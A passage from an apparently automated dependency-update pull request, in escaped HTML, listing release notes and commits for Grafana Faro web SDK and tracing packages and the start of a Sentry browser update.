href=\"https://github.com/grafana/faro-web-sdk/commit/9a99abf6c119c17652335880d0116321d0036a1e\"\u003e9a99abf\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e consolidate release-please into single changelog and unblock release PR (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2048\"\u003e#2048\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/14540489ca20ff2e1797700f14e440a7ea637709\"\u003e1454048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e correct jsonpath syntax in release-please extra-files (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2049\"\u003e#2049\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/0ca2dfe5d833c871ed115b9ed07854ea4e4fdbfb\"\u003e0ca2dfe\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e correct release-please changelog-path to unblock release flow (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2045\"\u003e#2045\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/1682dd9b959f7ac336d61fd65b91838e9166e87c\"\u003e1682dd9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e exclude CHANGELOG.md from markdownlint (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2062\"\u003e#2062\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/844256be8dfaf615c254f65bacb958c4a7eebfb4\"\u003e844256b\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e pre-format release-please PR to satisfy prettier check (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2051\"\u003e#2051\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/848ad907e7b1dc8b866b10335b3ecce3354e99a2\"\u003e848ad90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e two-stage yarn install in release-please cleanup step (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2053\"\u003e#2053\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/b87bd7c5e50eb76555a2477b0bdecda43c6ff473\"\u003eb87bd7c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2058\"\u003e#2058\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7f4f4d5f679671f04cdab654c194bdbb9ed42332\"\u003e7f4f4d5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8313816ee0a4a5307e92a95b596d0961b28b4b7d\"\u003e\u003ccode\u003e8313816\u003c/code\u003e\u003c/a\u003e chore: release 2.7.0 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2074\"\u003e#2074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ee4515a69fb00a776060ec721a19e8d02ba8c4b3\"\u003e\u003ccode\u003eee4515a\u003c/code\u003e\u003c/a\u003e chore(deps): update patch updates (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2076\"\u003e#2076\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003e\u003ccode\u003eef2d248\u003c/code\u003e\u003c/a\u003e fix: pin package manager and disable yarn/npm scripts (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2075\"\u003e#2075\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/028edd5f7178e0cde08811a40e23aae96dbf91ae\"\u003e\u003ccode\u003e028edd5\u003c/code\u003e\u003c/a\u003e chore: release 2.6.3 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/17193d67d1bd31587acc1a738138493a5fa6671f\"\u003e\u003ccode\u003e17193d6\u003c/code\u003e\u003c/a\u003e chore(main): release 2.6.2 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2068\"\u003e#2068\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de333f1de47cc520dd91aeb574325e6275564f86\"\u003e\u003ccode\u003ede333f1\u003c/code\u003e\u003c/a\u003e chore: release 2.6.1 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2064\"\u003e#2064\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/477938cfe351474ca7a609883e84a8eaee6c3457\"\u003e\u003ccode\u003e477938c\u003c/code\u003e\u003c/a\u003e chore: release main (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2052\"\u003e#2052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/dff5c2d652ddd8ac859c3bd1b1311e91cb53fe25\"\u003e\u003ccode\u003edff5c2d\u003c/code\u003e\u003c/a\u003e chore(deps): update patch updates (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2057\"\u003e#2057\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/517d26f17f96d21990e52c5804a0b77676f685df\"\u003e\u003ccode\u003e517d26f\u003c/code\u003e\u003c/a\u003e feat(web-sdk): add \u003ccode\u003ehttpHost\u003c/code\u003e to \u003ccode\u003efaro.performance.resource\u003c/code\u003e events (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2014\"\u003e#2014\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/0c6603eacb286719e363ac0ad44d0712bbf81cb3\"\u003e\u003ccode\u003e0c6603e\u003c/code\u003e\u003c/a\u003e chore(release): bump packages to v2.5.0 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2021\"\u003e#2021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/grafana/faro-web-sdk/commits/v2.7.0/packages/web-sdk\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@grafana/faro-web-tracing` from 2.4.0 to 2.7.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/grafana/faro-web-sdk/releases\"\u003e@​grafana/faro-web-tracing's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.7.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.3...v2.7.0\"\u003e2.7.0\u003c/a\u003e (2026-05-20)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e include git commit hash in app meta (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2039\"\u003e#2039\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/9c82ce49bc6d02c8a9b9a83227f101ce224a79b8\"\u003e9c82ce4\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fall back to window when resolving Metro bundle id (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2079\"\u003e#2079\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/3cfd6204b7bc83e5c440c523b6287993ccfbd728\"\u003e3cfd620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e bind Tempo OTLP receiver to 0.0.0.0 so Alloy can reach it (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2038\"\u003e#2038\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7a0af536a4a7254bf62473b20d04cf937ecd246a\"\u003e7a0af53\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e use \u003ccode\u003egrafana server\u003c/code\u003e subcommand for Grafana 13 image (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2035\"\u003e#2035\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/5d9210769e5e0752f41a3f543089397d9fe8149a\"\u003e5d92107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2077\"\u003e#2077\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8574f5579b8c84a829269aa7e19e76238daa6b6e\"\u003e8574f55\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003epin package manager and disable yarn/npm scripts (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2075\"\u003e#2075\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003eef2d248\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.6.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.2...v2.6.3\"\u003e2.6.3\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e make release-please auto-tag on merge (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2069\"\u003e#2069\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de9e2f05c28ea5644a8f8647c41f8eb686e2736c\"\u003ede9e2f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.6.2\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.2/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery. Release-please's title parser still doesn't match merged release PRs back to their config because of how it handles \u003ccode\u003ecomponent\u003c/code\u003e together with \u003ccode\u003einclude-component-in-tag: false\u003c/code\u003e. A follow-up will redesign the release-please configuration.\u003c/p\u003e\n\u003ch2\u003ev2.6.1\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.1/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery; release-please could not auto-tag PR \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2064\"\u003e#2064\u003c/a\u003e because the title pattern was missing \u003ccode\u003e${component}\u003c/code\u003e. Fixed in \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2066\"\u003e#2066\u003c/a\u003e \\u2014 the next release will tag automatically.\u003c/p\u003e\n\u003ch2\u003ev2.6.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.0/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery; release-please could not auto-tag PR \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2052\"\u003e#2052\u003c/a\u003e because its title (\u003ccode\u003echore: release main\u003c/code\u003e) lacked \u003ccode\u003e${version}\u003c/code\u003e. The PR title pattern was fixed in \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2063\"\u003e#2063\u003c/a\u003e — future releases will tag automatically.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/main/CHANGELOG.md\"\u003e@​grafana/faro-web-tracing's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.3...v2.7.0\"\u003e2.7.0\u003c/a\u003e (2026-05-20)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e include git commit hash in app meta (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2039\"\u003e#2039\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/9c82ce49bc6d02c8a9b9a83227f101ce224a79b8\"\u003e9c82ce4\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fall back to window when resolving Metro bundle id (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2079\"\u003e#2079\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/3cfd6204b7bc83e5c440c523b6287993ccfbd728\"\u003e3cfd620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e bind Tempo OTLP receiver to 0.0.0.0 so Alloy can reach it (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2038\"\u003e#2038\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7a0af536a4a7254bf62473b20d04cf937ecd246a\"\u003e7a0af53\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e use \u003ccode\u003egrafana server\u003c/code\u003e subcommand for Grafana 13 image (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2035\"\u003e#2035\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/5d9210769e5e0752f41a3f543089397d9fe8149a\"\u003e5d92107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2077\"\u003e#2077\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8574f5579b8c84a829269aa7e19e76238daa6b6e\"\u003e8574f55\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003epin package manager and disable yarn/npm scripts (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2075\"\u003e#2075\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003eef2d248\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.2...v2.6.3\"\u003e2.6.3\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e make release-please auto-tag on merge (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2069\"\u003e#2069\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de9e2f05c28ea5644a8f8647c41f8eb686e2736c\"\u003ede9e2f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.1...v2.6.2\"\u003e2.6.2\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e include ${component} in release-please PR title (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2066\"\u003e#2066\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/367aacc76fbb4777a61da40652bbe891826e0039\"\u003e367aacc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.0...v2.6.1\"\u003e2.6.1\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e set release-please PR title pattern with version (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2063\"\u003e#2063\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/4310b1685b4963de539919a15edd797aa21d032b\"\u003e4310b16\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.5.0...v2.6.0\"\u003e2.6.0\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereplay:\u003c/strong\u003e pause recording after user inactivity (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2015\"\u003e#2015\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/fedbe7ff41c592a7782737ea2200680cf8796800\"\u003efedbe7f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eweb-sdk:\u003c/strong\u003e add \u003ccode\u003ehttpHost\u003c/code\u003e to \u003ccode\u003efaro.performance.resource\u003c/code\u003e events (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2014\"\u003e#2014\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/517d26f17f96d21990e52c5804a0b77676f685df\"\u003e517d26f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e anchor release-please at v2.5.0 commit on main (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2061\"\u003e#2061\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/9a99abf6c119c17652335880d0116321d0036a1e\"\u003e9a99abf\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e consolidate release-please into single changelog and unblock release PR (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2048\"\u003e#2048\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/14540489ca20ff2e1797700f14e440a7ea637709\"\u003e1454048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e correct jsonpath syntax in release-please extra-files (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2049\"\u003e#2049\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/0ca2dfe5d833c871ed115b9ed07854ea4e4fdbfb\"\u003e0ca2dfe\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e correct release-please changelog-path to unblock release flow (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2045\"\u003e#2045\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/1682dd9b959f7ac336d61fd65b91838e9166e87c\"\u003e1682dd9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e exclude CHANGELOG.md from markdownlint (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2062\"\u003e#2062\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/844256be8dfaf615c254f65bacb958c4a7eebfb4\"\u003e844256b\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e pre-format release-please PR to satisfy prettier check (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2051\"\u003e#2051\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/848ad907e7b1dc8b866b10335b3ecce3354e99a2\"\u003e848ad90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e two-stage yarn install in release-please cleanup step (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2053\"\u003e#2053\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/b87bd7c5e50eb76555a2477b0bdecda43c6ff473\"\u003eb87bd7c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2058\"\u003e#2058\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7f4f4d5f679671f04cdab654c194bdbb9ed42332\"\u003e7f4f4d5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8313816ee0a4a5307e92a95b596d0961b28b4b7d\"\u003e\u003ccode\u003e8313816\u003c/code\u003e\u003c/a\u003e chore: release 2.7.0 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2074\"\u003e#2074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8574f5579b8c84a829269aa7e19e76238daa6b6e\"\u003e\u003ccode\u003e8574f55\u003c/code\u003e\u003c/a\u003e fix(deps): update npm-dependencies (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2077\"\u003e#2077\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003e\u003ccode\u003eef2d248\u003c/code\u003e\u003c/a\u003e fix: pin package manager and disable yarn/npm scripts (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2075\"\u003e#2075\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/028edd5f7178e0cde08811a40e23aae96dbf91ae\"\u003e\u003ccode\u003e028edd5\u003c/code\u003e\u003c/a\u003e chore: release 2.6.3 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/17193d67d1bd31587acc1a738138493a5fa6671f\"\u003e\u003ccode\u003e17193d6\u003c/code\u003e\u003c/a\u003e chore(main): release 2.6.2 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2068\"\u003e#2068\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de333f1de47cc520dd91aeb574325e6275564f86\"\u003e\u003ccode\u003ede333f1\u003c/code\u003e\u003c/a\u003e chore: release 2.6.1 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2064\"\u003e#2064\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/477938cfe351474ca7a609883e84a8eaee6c3457\"\u003e\u003ccode\u003e477938c\u003c/code\u003e\u003c/a\u003e chore: release main (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2052\"\u003e#2052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7f4f4d5f679671f04cdab654c194bdbb9ed42332\"\u003e\u003ccode\u003e7f4f4d5\u003c/code\u003e\u003c/a\u003e fix(deps): update npm-dependencies (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2058\"\u003e#2058\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/0c6603eacb286719e363ac0ad44d0712bbf81cb3\"\u003e\u003ccode\u003e0c6603e\u003c/code\u003e\u003c/a\u003e chore(release): bump packages to v2.5.0 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2021\"\u003e#2021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/445f3859b954ac2277aea361844ac5cb6615d9b0\"\u003e\u003ccode\u003e445f385\u003c/code\u003e\u003c/a\u003e fix(deps): update npm-dependencies (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2019\"\u003e#2019\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/grafana/faro-web-sdk/commits/v2.7.0/packages/web-tracing\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@sentry/browser` from 10.51.0 to 10.53.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-javascript/releases\"\u003e@​sentry/browser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.53.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(core): Include subpath type shims in published package (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/test-applications/nextjs-15-intl (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20821\"\u003e#20821\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eBundle size 📦\u003c/h2\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003ePath\u003c/th\u003e\n\u003cth\u003eSize\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e26.22 